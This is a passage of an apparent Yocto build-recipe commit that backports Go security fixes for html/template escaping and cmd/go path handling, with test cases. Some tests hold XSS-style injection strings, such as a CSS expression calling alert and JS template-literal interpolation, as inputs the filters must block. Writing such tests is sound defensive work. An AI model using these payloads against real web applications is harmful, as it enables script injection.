++	{"range with break", "{{range .SI}}{{.}}{{break}}{{end}}", noError,
++		`{{range .SI}}{{.}}{{break}}{{end}}`},
++	{"range with continue", "{{range .SI}}{{.}}{{continue}}{{end}}", noError,
++		`{{range .SI}}{{.}}{{continue}}{{end}}`},
+	{"constants", "{{range .SI 1 -3.2i true false 'a' nil}}{{end}}", noError,
+		`{{range .SI 1 -3.2i true false 'a' nil}}{{end}}`},
+	{"template", "{{template `x`}}", noError,
+@@ -279,6 +283,10 @@ var parseTests = []parseTest{
+	{"adjacent args", "{{printf 3`x`}}", hasError, ""},
+	{"adjacent args with .", "{{printf `x`.}}", hasError, ""},
+	{"extra end after if", "{{if .X}}a{{else if .Y}}b{{end}}{{end}}", hasError, ""},
++	{"break outside range", "{{range .}}{{end}} {{break}}", hasError, ""},
++	{"continue outside range", "{{range .}}{{end}} {{continue}}", hasError, ""},
++	{"break in range else", "{{range .}}{{else}}{{break}}{{end}}", hasError, ""},
++	{"continue in range else", "{{range .}}{{else}}{{continue}}{{end}}", hasError, ""},
+	// Other kinds of assignments and operators aren't available yet.
+	{"bug0a", "{{$x := 0}}{{$x}}", noError, "{{$x := 0}}{{$x}}"},
+	{"bug0b", "{{$x += 1}}{{$x}}", hasError, ""},
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch
new file mode 100644
index 0000000000..baf400b891
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch
@@ -0,0 +1,371 @@
+From 16f4882984569f179d73967c9eee679bb9b098c5 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Mon, 20 Mar 2023 11:01:13 -0700
+Subject: [PATCH 6/6] html/template: disallow actions in JS template literals
+
+ECMAScript 6 introduced template literals[0][1] which are delimited with
+backticks. These need to be escaped in a similar fashion to the
+delimiters for other string literals. Additionally template literals can
+contain special syntax for string interpolation.
+
+There is no clear way to allow safe insertion of actions within JS
+template literals, as handling (JS) string interpolation inside of these
+literals is rather complex. As such we've chosen to simply disallow
+template actions within these template literals.
+
+A new error code is added for this parsing failure case, errJsTmplLit,
+but it is unexported as it is not backwards compatible with other minor
+release versions to introduce an API change in a minor release. We will
+export this code in the next major release.
+
+The previous behavior (with the cavet that backticks are now escaped
+properly) can be re-enabled with GODEBUG=jstmpllitinterp=1.
+
+This change subsumes CL471455.
+
+Thanks to Sohom Datta, Manipal Institute of Technology, for reporting
+this issue.
+
+Fixes CVE-2023-24538
+For #59234
+Fixes #59271
+
+[0] https://tc39.es/ecma262/multipage/ecmascript-language-expressions.html#sec-template-literals
+[1] https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802457
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802612
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Change-Id: Ic7f10595615f2b2740d9c85ad7ef40dc0e78c04c
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481987
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/b1e3ecfa06b67014429a197ec5e134ce4303ad9b
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/html/template/context.go      |  2 ++
+ src/html/template/error.go        | 13 ++++++++
+ src/html/template/escape.go       | 11 +++++++
+ src/html/template/escape_test.go  | 66 ++++++++++++++++++++++-----------------
+ src/html/template/js.go           |  2 ++
+ src/html/template/js_test.go      |  2 +-
+ src/html/template/jsctx_string.go |  9 ++++++
+ src/html/template/state_string.go | 37 ++++++++++++++++++++--
+ src/html/template/transition.go   |  7 ++++-
+ 9 files changed, 116 insertions(+), 33 deletions(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index f7d4849..0b65313 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -116,6 +116,8 @@ const (
+	stateJSDqStr
+	// stateJSSqStr occurs inside a JavaScript single quoted string.
+	stateJSSqStr
++	// stateJSBqStr occurs inside a JavaScript back quoted string.
++	stateJSBqStr
+	// stateJSRegexp occurs inside a JavaScript regexp literal.
+	stateJSRegexp
+	// stateJSBlockCmt occurs inside a JavaScript /* block comment */.
+diff --git a/src/html/template/error.go b/src/html/template/error.go
+index 0e52706..fd26b64 100644
+--- a/src/html/template/error.go
++++ b/src/html/template/error.go
+@@ -211,6 +211,19 @@ const (
+	//   pipeline occurs in an unquoted attribute value context, "html" is
+	//   disallowed. Avoid using "html" and "urlquery" entirely in new templates.
+	ErrPredefinedEscaper
++
++	// errJSTmplLit: "... appears in a JS template literal"
++	// Example:
++	//     <script>var tmpl = `{{.Interp}`</script>
++	// Discussion:
++	//   Package html/template does not support actions inside of JS template
++	//   literals.
++	//
++	// TODO(rolandshoemaker): we cannot add this as an exported error in a minor
++	// release, since it is backwards incompatible with the other minor
++	// releases. As such we need to leave it unexported, and then we'll add it
++	// in the next major release.
++	errJSTmplLit
+ )
+
+ func (e *Error) Error() string {
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index f12dafa..29ca5b3 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -8,6 +8,7 @@ import (
+	"bytes"
+	"fmt"
+	"html"
++	"internal/godebug"
+	"io"
+	"text/template"
+	"text/template/parse"
+@@ -203,6 +204,16 @@ func (e *escaper) escapeAction(c context, n *parse.ActionNode) context {
+		c.jsCtx = jsCtxDivOp
+	case stateJSDqStr, stateJSSqStr:
+		s = append(s, "_html_template_jsstrescaper")
++	case stateJSBqStr:
++		debugAllowActionJSTmpl := godebug.Get("jstmpllitinterp")
++		if debugAllowActionJSTmpl == "1" {
++			s = append(s, "_html_template_jsstrescaper")
++		} else {
++			return context{
++				state: stateError,
++				err:   errorf(errJSTmplLit, n, n.Line, "%s appears in a JS template literal", n),
++			}
++		}
+	case stateJSRegexp:
+		s = append(s, "_html_template_jsregexpescaper")
+	case stateCSS:
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index fa2b84a..1b150e9 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -681,35 +681,31 @@ func TestEscape(t *testing.T) {
+	}
+
+	for _, test := range tests {
+-		tmpl := New(test.name)
+-		tmpl = Must(tmpl.Parse(test.input))
+-		// Check for bug 6459: Tree field was not set in Parse.
+-		if tmpl.Tree != tmpl.text.Tree {
+-			t.Errorf("%s: tree not set properly", test.name)
+-			continue
+-		}
+-		b := new(bytes.Buffer)
+-		if err := tmpl.Execute(b, data); err != nil {
+-			t.Errorf("%s: template execution failed: %s", test.name, err)
+-			continue
+-		}
+-		if w, g := test.output, b.String(); w != g {
+-			t.Errorf("%s: escaped output: want\n\t%q\ngot\n\t%q", test.name, w, g)
+-			continue
+-		}
+-		b.Reset()
+-		if err := tmpl.Execute(b, pdata); err != nil {
+-			t.Errorf("%s: template execution failed for pointer: %s", test.name, err)
+-			continue
+-		}
+-		if w, g := test.output, b.String(); w != g {
+-			t.Errorf("%s: escaped output for pointer: want\n\t%q\ngot\n\t%q", test.name, w, g)
+-			continue
+-		}
+-		if tmpl.Tree != tmpl.text.Tree {
+-			t.Errorf("%s: tree mismatch", test.name)
+-			continue
+-		}
++		t.Run(test.name, func(t *testing.T) {
++			tmpl := New(test.name)
++			tmpl = Must(tmpl.Parse(test.input))
++			// Check for bug 6459: Tree field was not set in Parse.
++			if tmpl.Tree != tmpl.text.Tree {
++				t.Fatalf("%s: tree not set properly", test.name)
++			}
++			b := new(strings.Builder)
++			if err := tmpl.Execute(b, data); err != nil {
++				t.Fatalf("%s: template execution failed: %s", test.name, err)
++			}
++			if w, g := test.output, b.String(); w != g {
++				t.Fatalf("%s: escaped output: want\n\t%q\ngot\n\t%q", test.name, w, g)
++			}
++			b.Reset()
++			if err := tmpl.Execute(b, pdata); err != nil {
++				t.Fatalf("%s: template execution failed for pointer: %s", test.name, err)
++			}
++			if w, g := test.output, b.String(); w != g {
++				t.Fatalf("%s: escaped output for pointer: want\n\t%q\ngot\n\t%q", test.name, w, g)
++			}
++			if tmpl.Tree != tmpl.text.Tree {
++				t.Fatalf("%s: tree mismatch", test.name)
++			}
++		})
+	}
+ }
+
+@@ -936,6 +932,10 @@ func TestErrors(t *testing.T) {
+			"{{range .Items}}<a{{if .X}}{{end}}>{{if .X}}{{break}}{{end}}{{end}}",
+			"",
+		},
++		{
++			"<script>var a = `${a+b}`</script>`",
++			"",
++		},
+		// Error cases.
+		{
+			"{{if .Cond}}<a{{end}}",
+@@ -1082,6 +1082,10 @@ func TestErrors(t *testing.T) {
+			// html is allowed since it is the last command in the pipeline, but urlquery is not.
+			`predefined escaper "urlquery" disallowed in template`,
+		},
++		{
++			"<script>var tmpl = `asd {{.}}`;</script>",
++			`{{.}} appears in a JS template literal`,
++		},
+	}
+	for _, test := range tests {
+		buf := new(bytes.Buffer)
+@@ -1304,6 +1308,10 @@ func TestEscapeText(t *testing.T) {
+			context{state: stateJSSqStr, delim: delimDoubleQuote, attr: attrScript},
+		},
+		{
++			"<a onclick=\"`foo",
++			context{state: stateJSBqStr, delim: delimDoubleQuote, attr: attrScript},
++		},
++		{
+			`<A ONCLICK="'`,
+			context{state: stateJSSqStr, delim: delimDoubleQuote, attr: attrScript},
+		},
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index ea9c183..b888eaf 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -308,6 +308,7 @@ var jsStrReplacementTable = []string{
+	// Encode HTML specials as hex so the output can be embedded
+	// in HTML attributes without further encoding.
+	'"':  `\u0022`,
++	'`':  `\u0060`,
+	'&':  `\u0026`,
+	'\'': `\u0027`,
+	'+':  `\u002b`,
+@@ -331,6 +332,7 @@ var jsStrNormReplacementTable = []string{
+	'"':  `\u0022`,
+	'&':  `\u0026`,
+	'\'': `\u0027`,
++	'`':  `\u0060`,
+	'+':  `\u002b`,
+	'/':  `\/`,
+	'<':  `\u003c`,
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index d7ee47b..7d963ae 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -292,7 +292,7 @@ func TestEscapersOnLower7AndSelectHighCodepoints(t *testing.T) {
+				`0123456789:;\u003c=\u003e?` +
+				`@ABCDEFGHIJKLMNO` +
+				`PQRSTUVWXYZ[\\]^_` +
+-				"`abcdefghijklmno" +
++				"\\u0060abcdefghijklmno" +
+				"pqrstuvwxyz{|}~\u007f" +
+				"\u00A0\u0100\\u2028\\u2029\ufeff\U0001D11E",
+		},
+diff --git a/src/html/template/jsctx_string.go b/src/html/template/jsctx_string.go
+index dd1d87e..2394893 100644
+--- a/src/html/template/jsctx_string.go
++++ b/src/html/template/jsctx_string.go
+@@ -4,6 +4,15 @@ package template
+
+ import "strconv"
+
++func _() {
++	// An "invalid array index" compiler error signifies that the constant values have changed.
++	// Re-run the stringer command to generate them again.
++	var x [1]struct{}
++	_ = x[jsCtxRegexp-0]
++	_ = x[jsCtxDivOp-1]
++	_ = x[jsCtxUnknown-2]
++}
++
+ const _jsCtx_name = "jsCtxRegexpjsCtxDivOpjsCtxUnknown"
+
+ var _jsCtx_index = [...]uint8{0, 11, 21, 33}
+diff --git a/src/html/template/state_string.go b/src/html/template/state_string.go
+index 05104be..6fb1a6e 100644
+--- a/src/html/template/state_string.go
++++ b/src/html/template/state_string.go
+@@ -4,9 +4,42 @@ package template
+
+ import "strconv"
+
+-const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateError"
++func _() {
++	// An "invalid array index" compiler error signifies that the constant values have changed.
++	// Re-run the stringer command to generate them again.
++	var x [1]struct{}
++	_ = x[stateText-0]
++	_ = x[stateTag-1]
++	_ = x[stateAttrName-2]
++	_ = x[stateAfterName-3]
++	_ = x[stateBeforeValue-4]
++	_ = x[stateHTMLCmt-5]
++	_ = x[stateRCDATA-6]
++	_ = x[stateAttr-7]
++	_ = x[stateURL-8]
++	_ = x[stateSrcset-9]
++	_ = x[stateJS-10]
++	_ = x[stateJSDqStr-11]
++	_ = x[stateJSSqStr-12]
++	_ = x[stateJSBqStr-13]
++	_ = x[stateJSRegexp-14]
++	_ = x[stateJSBlockCmt-15]
++	_ = x[stateJSLineCmt-16]
++	_ = x[stateCSS-17]
++	_ = x[stateCSSDqStr-18]
++	_ = x[stateCSSSqStr-19]
++	_ = x[stateCSSDqURL-20]
++	_ = x[stateCSSSqURL-21]
++	_ = x[stateCSSURL-22]
++	_ = x[stateCSSBlockCmt-23]
++	_ = x[stateCSSLineCmt-24]
++	_ = x[stateError-25]
++	_ = x[stateDead-26]
++}
++
++const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
+
+-var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 155, 170, 184, 192, 205, 218, 231, 244, 255, 271, 286, 296}
++var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 204, 217, 230, 243, 256, 267, 283, 298, 308, 317}
+
+ func (i state) String() string {
+	if i >= state(len(_state_index)-1) {
+diff --git a/src/html/template/transition.go b/src/html/template/transition.go
+index 06df679..92eb351 100644
+--- a/src/html/template/transition.go
++++ b/src/html/template/transition.go
+@@ -27,6 +27,7 @@ var transitionFunc = [...]func(context, []byte) (context, int){
+	stateJS:          tJS,
+	stateJSDqStr:     tJSDelimited,
+	stateJSSqStr:     tJSDelimited,
++	stateJSBqStr:     tJSDelimited,
+	stateJSRegexp:    tJSDelimited,
+	stateJSBlockCmt:  tBlockCmt,
+	stateJSLineCmt:   tLineCmt,
+@@ -262,7 +263,7 @@ func tURL(c context, s []byte) (context, int) {
+
+ // tJS is the context transition function for the JS state.
+ func tJS(c context, s []byte) (context, int) {
+-	i := bytes.IndexAny(s, `"'/`)
++	i := bytes.IndexAny(s, "\"`'/")
+	if i == -1 {
+		// Entire input is non string, comment, regexp tokens.
+		c.jsCtx = nextJSCtx(s, c.jsCtx)
+@@ -274,6 +275,8 @@ func tJS(c context, s []byte) (context, int) {
+		c.state, c.jsCtx = stateJSDqStr, jsCtxRegexp
+	case '\'':
+		c.state, c.jsCtx = stateJSSqStr, jsCtxRegexp
++	case '`':
++		c.state, c.jsCtx = stateJSBqStr, jsCtxRegexp
+	case '/':
+		switch {
+		case i+1 < len(s) && s[i+1] == '/':
+@@ -303,6 +306,8 @@ func tJSDelimited(c context, s []byte) (context, int) {
+	switch c.state {
+	case stateJSSqStr:
+		specials = `\'`
++	case stateJSBqStr:
++		specials = "`\\"
+	case stateJSRegexp:
+		specials = `\/[]`
+	}
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch
new file mode 100644
index 0000000000..281b6486a8
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch
@@ -0,0 +1,60 @@
+From 8673ca81e5340b87709db2d9749c92a3bf925df1 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 13 Apr 2023 15:40:44 -0700
+Subject: [PATCH] html/template: disallow angle brackets in CSS values
+
+Angle brackets should not appear in CSS contexts, as they may affect
+token boundaries (such as closing a <style> tag, resulting in
+injection). Instead emit filterFailsafe, matching the behavior for other
+dangerous characters.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes #59720
+Fixes CVE-2023-24539
+
+Change-Id: Iccc659c9a18415992b0c05c178792228e3a7bae4
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1826636
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/491615
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/8673ca81e5340b87709db2d9749c92a3bf925df1]
+CVE: CVE-2023-24539
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+---
+ src/html/template/css.go      | 2 +-
+ src/html/template/css_test.go | 2 ++
+ 2 files changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/src/html/template/css.go b/src/html/template/css.go
+index 890a0c6b227fe..f650d8b3e843a 100644
+--- a/src/html/template/css.go
++++ b/src/html/template/css.go
+@@ -238,7 +238,7 @@ func cssValueFilter(args ...any) string {
+ 	// inside a string that might embed JavaScript source.
+ 	for i, c := range b {
+ 		switch c {
+-		case 0, '"', '\'', '(', ')', '/', ';', '@', '[', '\\', ']', '`', '{', '}':
++		case 0, '"', '\'', '(', ')', '/', ';', '@', '[', '\\', ']', '`', '{', '}', '<', '>':
+ 			return filterFailsafe
+ 		case '-':
+ 			// Disallow <!-- or -->.
+diff --git a/src/html/template/css_test.go b/src/html/template/css_test.go
+index a735638b0314f..2b76256a766e9 100644
+--- a/src/html/template/css_test.go
++++ b/src/html/template/css_test.go
+@@ -231,6 +231,8 @@ func TestCSSValueFilter(t *testing.T) {
+ 		{`-exp\000052 ession(alert(1337))`, "ZgotmplZ"},
+ 		{`-expre\0000073sion`, "-expre\x073sion"},
+ 		{`@import url evil.css`, "ZgotmplZ"},
++		{"<", "ZgotmplZ"},
++		{">", "ZgotmplZ"},
+ 	}
+ 	for _, test := range tests {
+ 		got := cssValueFilter(test.css)
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch
new file mode 100644
index 0000000000..799a0dfcda
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch
@@ -0,0 +1,90 @@
+From ce7bd33345416e6d8cac901792060591cafc2797 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Tue, 11 Apr 2023 16:27:43 +0100
+Subject: [PATCH] [release-branch.go1.19] html/template: handle all JS
+ whitespace characters
+
+Rather than just a small set. Character class as defined by \s [0].
+
+Thanks to Juho Nurminen of Mattermost for reporting this.
+
+For #59721
+Fixes  #59813
+Fixes CVE-2023-24540
+
+[0] https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions/Character_Classes
+
+Change-Id: I56d4fa1ef08125b417106ee7dbfb5b0923b901ba
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1821459
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1851497
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/491355
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+TryBot-Bypass: Carlos Amedee <carlos@golang.org>
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ce7bd33345416e6d8cac901792060591cafc2797]
+CVE: CVE-2023-24540
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/html/template/js.go      |  8 +++++++-
+ src/html/template/js_test.go | 11 +++++++----
+ 2 files changed, 14 insertions(+), 5 deletions(-)
+
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index fe7054efe5cd8..4e05c1455723f 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -13,6 +13,11 @@ import (
+ 	"unicode/utf8"
+ )
+ 
++// jsWhitespace contains all of the JS whitespace characters, as defined
++// by the \s character class.
++// See https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_expressions/Character_classes.
++const jsWhitespace = "\f\n\r\t\v\u0020\u00a0\u1680\u2000\u2001\u2002\u2003\u2004\u2005\u2006\u2007\u2008\u2009\u200a\u2028\u2029\u202f\u205f\u3000\ufeff"
++
+ // nextJSCtx returns the context that determines whether a slash after the
+ // given run of tokens starts a regular expression instead of a division
+ // operator: / or /=.
+@@ -26,7 +31,8 @@ import (
+ // JavaScript 2.0 lexical grammar and requires one token of lookbehind:
+ // https://www.mozilla.org/js/language/js20-2000-07/rationale/syntax.html
+ func nextJSCtx(s []byte, preceding jsCtx) jsCtx {
+-	s = bytes.TrimRight(s, "\t\n\f\r \u2028\u2029")
++	// Trim all JS whitespace characters
++	s = bytes.TrimRight(s, jsWhitespace)
+ 	if len(s) == 0 {
+ 		return preceding
+ 	}
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index e07c695f7a77d..e52180cc113b5 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -81,14 +81,17 @@ func TestNextJsCtx(t *testing.T) {
+ 		{jsCtxDivOp, "0"},
+ 		// Dots that are part of a number are div preceders.
+ 		{jsCtxDivOp, "0."},
++		// Some JS interpreters treat NBSP as a normal space, so
++		// we must too in order to properly escape things.
++		{jsCtxRegexp, "=\u00A0"},
+ 	}
+ 
+ 	for _, test := range tests {
+-		if nextJSCtx([]byte(test.s), jsCtxRegexp) != test.jsCtx {
+-			t.Errorf("want %s got %q", test.jsCtx, test.s)
++		if ctx := nextJSCtx([]byte(test.s), jsCtxRegexp); ctx != test.jsCtx {
++			t.Errorf("%q: want %s got %s", test.s, test.jsCtx, ctx)
+ 		}
+-		if nextJSCtx([]byte(test.s), jsCtxDivOp) != test.jsCtx {
+-			t.Errorf("want %s got %q", test.jsCtx, test.s)
++		if ctx := nextJSCtx([]byte(test.s), jsCtxDivOp); ctx != test.jsCtx {
++			t.Errorf("%q: want %s got %s", test.s, test.jsCtx, ctx)
+ 		}
+ 	}
+ 
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch
new file mode 100644
index 0000000000..092c7aa0ff
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch
@@ -0,0 +1,94 @@
+From 0d347544cbca0f42b160424f6bc2458ebcc7b3fc Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 13 Apr 2023 14:01:50 -0700
+Subject: [PATCH] html/template: emit filterFailsafe for empty unquoted attr
+ value
+
+An unquoted action used as an attribute value can result in unsafe
+behavior if it is empty, as HTML normalization will result in unexpected
+attributes, and may allow attribute injection. If executing a template
+results in a empty unquoted attribute value, emit filterFailsafe
+instead.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes #59722
+Fixes CVE-2023-29400
+
+Change-Id: Ia38d1b536ae2b4af5323a6c6d861e3c057c2570a
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1826631
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/491617
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/0d347544cbca0f42b160424f6bc2458ebcc7b3fc]
+CVE: CVE-2023-29400
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+---
+ src/html/template/escape.go      |  5 ++---
+ src/html/template/escape_test.go | 15 +++++++++++++++
+ src/html/template/html.go        |  3 +++
+ 3 files changed, 20 insertions(+), 3 deletions(-)
+
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index 4ba1d6b31897e..a62ef159f0dcd 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -382,9 +382,8 @@ func normalizeEscFn(e string) string {
+ // for all x.
+ var redundantFuncs = map[string]map[string]bool{
+ 	"_html_template_commentescaper": {
+-		"_html_template_attrescaper":    true,
+-		"_html_template_nospaceescaper": true,
+-		"_html_template_htmlescaper":    true,
++		"_html_template_attrescaper": true,
++		"_html_template_htmlescaper": true,
+ 	},
+ 	"_html_template_cssescaper": {
+ 		"_html_template_attrescaper": true,
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index 3dd212bac9406..f8b2b448f2dfa 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -678,6 +678,21 @@ func TestEscape(t *testing.T) {
+ 			`<img srcset={{",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"}}>`,
+ 			`<img srcset=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,>`,
+ 		},
++		{
++			"unquoted empty attribute value (plaintext)",
++			"<p name={{.U}}>",
++			"<p name=ZgotmplZ>",
++		},
++		{
++			"unquoted empty attribute value (url)",
++			"<p href={{.U}}>",
++			"<p href=ZgotmplZ>",
++		},
++		{
++			"quoted empty attribute value",
++			"<p name=\"{{.U}}\">",
++			"<p name=\"\">",
++		},
+ 	}
+ 
+ 	for _, test := range tests {
+diff --git a/src/html/template/html.go b/src/html/template/html.go
+index bcca0b51a0ef9..a181699a5bda8 100644
+--- a/src/html/template/html.go
++++ b/src/html/template/html.go
+@@ -14,6 +14,9 @@ import (
+ // htmlNospaceEscaper escapes for inclusion in unquoted attribute values.
+ func htmlNospaceEscaper(args ...interface{}) string {
+ 	s, t := stringify(args...)
++	if s == "" {
++		return filterFailsafe
++	}
+ 	if t == contentTypeHTML {
+ 		return htmlReplacer(stripTags(s), htmlNospaceNormReplacementTable, false)
+ 	}
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch
new file mode 100644
index 0000000000..01eed9fe1b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch
@@ -0,0 +1,201 @@
+rom c160b49b6d328c86bd76ca2fff9009a71347333f Mon Sep 17 00:00:00 2001
+From: "Bryan C. Mills" <bcmills@google.com>
+Date: Fri, 12 May 2023 14:15:16 -0400
+Subject: [PATCH] [release-branch.go1.19] cmd/go: disallow package directories
+ containing newlines
+
+Directory or file paths containing newlines may cause tools (such as
+cmd/cgo) that emit "//line" or "#line" -directives to write part of
+the path into non-comment lines in generated source code. If those
+lines contain valid Go code, it may be injected into the resulting
+binary.
+
+(Note that Go import paths and file paths within module zip files
+already could not contain newlines.)
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Updates #60167.
+Fixes #60515.
+Fixes CVE-2023-29402.
+
+Change-Id: If55d0400c02beb7a5da5eceac60f1abeac99f064
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1882606
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Russ Cox <rsc@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 41f9046495564fc728d6f98384ab7276450ac7e2)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902229
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904343
+Reviewed-by: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Bryan Mills <bcmills@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501218
+Run-TryBot: David Chase <drchase@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c160b49b6d328c86bd76ca2fff9009a71347333f]
+CVE: CVE-2023-29402
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/cmd/go/internal/load/pkg.go               |   4 +
+ src/cmd/go/internal/work/exec.go              |   6 ++
+ src/cmd/go/script_test.go                     |   1 +
+ .../go/testdata/script/build_cwd_newline.txt  | 100 ++++++++++++++++++
+ 4 files changed, 111 insertions(+)
+ create mode 100644 src/cmd/go/testdata/script/build_cwd_newline.txt
+
